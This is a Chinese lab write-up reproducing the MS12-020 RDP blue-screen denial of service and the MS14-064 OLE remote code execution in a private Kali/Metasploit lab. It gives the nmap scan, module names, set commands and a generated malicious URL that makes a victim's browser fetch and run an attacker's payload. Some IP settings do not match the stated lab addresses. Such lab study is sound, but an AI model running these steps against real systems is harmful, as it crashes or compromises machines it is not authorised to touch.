漏洞复现--实验记录(MS12-020、MS14-064)

漏洞复现

• 一、MS12-020(蓝屏攻击)漏洞
• • 1.原理
  • 2.实验环境
  • 3.漏洞复现
  • • 1、开启win2003的远程桌面：控制面板-->系统-->远程-->远程协助-->远程桌面
    • 2、控制面板-->windows防火墙-->例外-->远程桌面
    • 3、用nmap扫描靶机，发现靶机的3389端口已经打开
    • 4、在kali的终端中打开msfconsole
    • 5、使用search功能搜索ms12-020，发现有两个可用模块。
    • 6、使用第一个可用版模块
    • 7、利用set命令设置攻击的IP。
    • 8、输入：exploit，执行攻击
    • 9、看一下靶机，发现靶机蓝屏了
• 二、MS14-064(OLE远程代码执行)漏洞
• • 1.原理
  • 2.实验环境
  • 3.漏洞复现
  • • 1、打开kali 进入MSF框架
    • 2、找到MS14-064漏洞
    • 3、查看当前模块参数
    • 4、设置参数
    • 5、查看和设置可攻击目标
    • 6、执行获得恶意链接

一、MS12-020(蓝屏攻击)漏洞

1.原理

ms12-020漏洞的定义是指操作系统的远程桌面协议存在重大漏洞，入侵者（黑客）可以通过向远程桌面默认端口（3389）发一系列特定RDP包，从而获取超级管理员权限，进而入侵系统，Windows在处理某些RDP报文时Terminal Server 存在错误，可被利用造成服务停止响应（蓝屏）

根据实际被入侵终端进行分析，开放远程桌面服务并使用默认的3389端口的会成为攻击目标。

微软的安全公告：Windows全系列操作系统（WinXP/Vista/Win7/Win2000/ Win2003/Win2008）均存在受控威胁。

2.实验环境

攻击机：kali IP：192.168.92.128
靶机win2003 IP：192.168.92.148
两者都在同一内网，采用NAT连接方式

3.漏洞复现

1、开启win2003的远程桌面：控制面板–>系统–>远程–>远程协助–>远程桌面

2、控制面板–>windows防火墙–>例外–>远程桌面

3、用nmap扫描靶机，发现靶机的3389端口已经打开

输入：nmap 192.168.92.148

4、在kali的终端中打开msfconsole

5、使用search功能搜索ms12-020，发现有两个可用模块。

输入：search ms12-020

6、使用第一个可用版模块

输入：use auxiliary/dos/windows/rdp/ma12_020_maxchannelids
或者use 0

7、利用set命令设置攻击的IP。

输入：set rhosts 192.168.252.160

show options

8、输入：exploit，执行攻击

9、看一下靶机，发现靶机蓝屏了

二、MS14-064(OLE远程代码执行)漏洞

1.原理

Microsoft Windows OLE远程代码执行漏洞，OLE（对象链接与嵌入）是一种允许应用程序共享数据和功能的技术，远程攻击者利用此漏洞通过构造的网站执行任意代码，影响Win95+IE3 –Win10+IE11全版本。

生成一个恶意链接，让用户点击后，用户的ie浏览器会执行操作：访问攻击者指定的ip下载并执行恶意程序，当用户执行恶意程序后，攻击者就能链接到用户的电脑。

2.实验环境

攻击机：kali ip：192.168.92.128
靶机：win2003 ip：192.168.92.148
工具kali MSF

3.漏洞复现

1、打开kali 进入MSF框架

2、找到MS14-064漏洞

search ms14-064
use 0

3、查看当前模块参数

show options

4、设置参数

set AllowPowershellPrompt true
set srvhost 192.168.204.128
//设置服务器地址ip

5、查看和设置可攻击目标

show targets
set targets 1

6、执行获得恶意链接

run
exploit

http://192.168.92.128:8080/48RjcxdmmZe41H